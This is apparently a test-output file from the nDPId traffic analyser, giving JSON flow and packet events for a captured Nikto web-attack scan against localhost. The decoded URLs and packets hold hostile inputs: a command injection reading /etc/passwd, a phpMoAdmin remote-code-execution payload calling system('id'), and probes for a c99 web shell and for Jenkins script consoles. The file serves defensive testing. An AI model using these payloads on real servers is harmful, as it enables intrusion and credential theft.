+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_packet_id":1,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277926,"pkt":"AAAAAAAAAAAAAAAACABFAAC8cdVAAEAGymR\/AAABfwAAAceUH5AbWUib+wxcy4AYAED+sAAAAQEICp1m\/86dZv\/OR0VUIC9jOTkucGhwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY3MzkpDQoNCg=="} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":765,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277926,"flow_last_seen":1576420277926,"flow_idle_time":7560000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277926,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c99.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006739)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_packet_id":1,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"thread_ts_msec":1576420277928,"pkt":"AAAAAAAAAAAAAAAACABFAAD73s9AAEAGXSt\/AAABfwAAAceWH5B+NOeIVrpz2oAYAED+7wAAAQEICp1m\/9CdZv\/PR0VUIC9hd2N1c2VyL2NnaS1iaW4vdmNzP3hzbD0vdmNzL3Zjc19ob21lLnhzbCUyNmNhdCUyMCUyMi9ldGMvcGFzc3dkJTIyJTI2IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":766,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277928,"flow_last_seen":1576420277928,"flow_idle_time":7560000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1576420277928,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/awcuser\/cgi-bin\/vcs?xsl=\/vcs\/vcs_home.xsl%26cat%20%22\/etc\/passwd%22%26","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006994)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420277929,"pkt":"AAAAAAAAAAAAAAAACABFAAC7MdtAAEAGCmB\/AAABfwAAAceYH5BhLQiUIFdU+oAYAED+rwAAAQEICp1m\/9GdZv\/RR0VUIC9zY3JpcHQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY5OTkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":767,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277929,"flow_last_seen":1576420277929,"flow_idle_time":7560000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420277929,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277931,"pkt":"AAAAAAAAAAAAAAAACABFAADDfttAAEAGvVd\/AAABfwAAAceaH5AHCUeUa2pQhIAYAED+twAAAQEICp1m\/9OdZv\/SR0VUIC9qZW5raW5zL3NjcmlwdCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":768,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277931,"flow_last_seen":1576420277931,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277931,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/jenkins\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277933,"pkt":"AAAAAAAAAAAAAAAACABFAADCrgRAAEAGji9\/AAABfwAAAcecH5DcgpdKIx+4uoAYAED+tgAAAQEICp1m\/9WdZv\/VR0VUIC9odWRzb24vc2NyaXB0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2OTk5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":769,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277933,"flow_last_seen":1576420277933,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/hudson\/script","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006999)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277971,"pkt":"AAAAAAAAAAAAAAAACABFAAFctdFAAEAGhch\/AAABfwAAAcfMH5DMiIyc+KcBsoAYAED\/UAAAAQEICp1m\/\/udZv\/7R0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":770,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277971,"flow_last_seen":1576420277971,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277971,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51148,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277972,"pkt":"AAAAAAAAAAAAAAAACABFAAFnwDVAAEAGe1l\/AAABfwAAAcfOH5AQvflnbGoufoAYAED\/WwAAAQEICp1m\/\/ydZv\/8R0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":771,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277972,"flow_last_seen":1576420277972,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277972,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51150,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277974,"pkt":"AAAAAAAAAAAAAAAACABFAAFncRdAAEAGynd\/AAABfwAAAcfQH5DeNEhBp6LH9oAYAED\/WwAAAQEICp1m\/\/2dZv\/9R0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":772,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277974,"flow_last_seen":1576420277974,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277974,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51152,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277975,"pkt":"AAAAAAAAAAAAAAAACABFAAFkoPRAAEAGmp1\/AAABfwAAAcfSH5BFc5mo+BaB54AYAED\/WAAAAQEICp1m\/\/+dZv\/\/R0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":773,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277975,"flow_last_seen":1576420277975,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277975,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51154,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277976,"pkt":"AAAAAAAAAAAAAAAACABFAAFfD0hAAEAGLE9\/AAABfwAAAcfUH5ChoTYRo2DY7oAYAED\/UwAAAQEICp1nAACdZwAAR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":774,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277976,"flow_last_seen":1576420277976,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277976,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} 